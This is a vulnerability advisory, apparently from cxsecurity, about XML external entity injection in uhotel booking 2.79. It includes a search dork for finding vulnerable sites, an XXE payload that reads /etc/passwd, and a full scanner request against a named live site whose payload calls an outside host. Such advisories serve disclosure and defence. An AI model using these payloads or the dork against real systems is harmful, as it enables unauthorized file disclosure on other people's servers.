uhotel booking 2.79. XML external entity injection Vulnerability

2018.08.03
dz indoushka (DZ) dz
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

==================================================================================================================================== | # Title : uhotel booking 2.79. XML external entity injection Vulnerability | | # Author : indoushka | | # Tested on : windows 10 Français V.(Pro) / browser : Mozila Firefox 61.0.1 (32-bit) | | # Vendor : http://hotel-booking-script.com/ | | # Dork : "index.php?page=check_hotels" | ==================================================================================================================================== poc : [+] Dorking İn Google Or Other Search Enggine . [+] Vulnerability description : XML supports a facility known as "external entities", which instruct an XML processor to retrieve and perform an inline include of XML located at a particular URI. An external XML entity can be used to append or modify the document type declaration (DTD) associated with an XML document. An external XML entity can also be used to include XML within the content of an XML document. Now assume that the XML processor parses data originating from a source under attacker control. Most of the time the processor will not be validating, but it MAY include the replacement text thus initiating an unexpected file open operation, or HTTP transfer, or whatever system ids the XML processor knows how to access. below is a sample XML document that will use this functionality to include the contents of a local file (/etc/passwd) <?xml version="1.0" encoding="utf-8"?> <!DOCTYPE acunetix [ <!ENTITY cxsecurity SYSTEM "file:///etc/passwd"> ]> <xxx>&cxsecurity;</xxx> This vulnerability affects /index.php. Attack details : URL encoded POST input room_id was set to <?xml version="1.0" encoding="utf-8"?> <!DOCTYPE acunetix [ <!ENTITY cxsecurity SYSTEM "http://hitPJfP5d66A8.bxss.me/"> ]> <xxx>&cxsecurity;</xxx> An HTTP request was initiated for the domain hitPJfP5d66A8.bxss.me which indicates that this script is vulnerable to XXE injection. HTTP request details: IP address: 106.11.219.134 User agent: Java/1.8.0_65-AliJVM DNS IP: 106.11.41.134 DNS TYPE: A DNS QUERY: hitPJfP5d66A8.bxss.me View HTTP headers Request POST /index.php?page=check_availability HTTP/1.1 Content-Length: 462 Content-Type: application/x-www-form-urlencoded Cookie: PHPSESSID=7bb079f6667e0c4690caddf774df314e Host: www.europe4people.com Connection: Keep-alive Accept-Encoding: gzip,deflate User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21 Accept: */* checkin_date=12/07/2018&checkout_date=13/07/2018&hotel_sel_id=&hotel_sel_loc=555-666-0606&hotel_sel_loc_id=&max_adults=3&max_children=2&minimum_bads=1&p=1&property_type_id=1&room_id=<%3fxml%20version%3d%221.0%22%20encoding%3d%22utf-8%22%3f>%0d%0a<%21DOCTYPE%20acunetix%20%5b%0d%0a%20%20<%21ENTITY%20cxsecurity%20SYSTEM%20%22http://hitPJfP5d66A8.bxss.me/%22>%0d%0a%5d>%0d%0a<xxx>%26cxsecurity;</xxx>%0d%0a&sort_by=name-a-z&token=821df715f8fa2c662611b5f7727d7aa7Response HTTP/1.1 403 Forbidden Date: Thu, 12 Jul 2018 21:54:52 GMT Server: Varnish X-Varnish: 735875562 Content-Type: text/html; charset=utf-8 Content-Length: 18 Connection: keep-alive Greetings to :========================================================================================================================= | jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * djroot.dz * LiquidWorm* Hussin-X *D4NB4R * shadow_00715 * yasMouh | | =======================================================================================================================================


Vote for this issue:
100%
0%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2018, cxsecurity.com

 

Back to Top